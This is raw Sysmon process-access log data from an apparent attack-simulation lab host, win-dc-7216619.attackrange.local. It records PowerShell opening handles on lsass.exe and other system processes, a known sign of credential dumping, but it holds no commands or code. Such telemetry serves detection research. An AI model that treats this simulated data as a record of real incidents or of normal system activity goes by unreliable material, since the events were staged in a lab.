10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-0D00-000000007F01}616C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1400-000000007F01}1348C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFA-5F80-1F00-000000007F01}2288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1A00-000000007F01}2176C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.885{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFA-5F80-1E00-000000007F01}2280C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.338{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.323{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 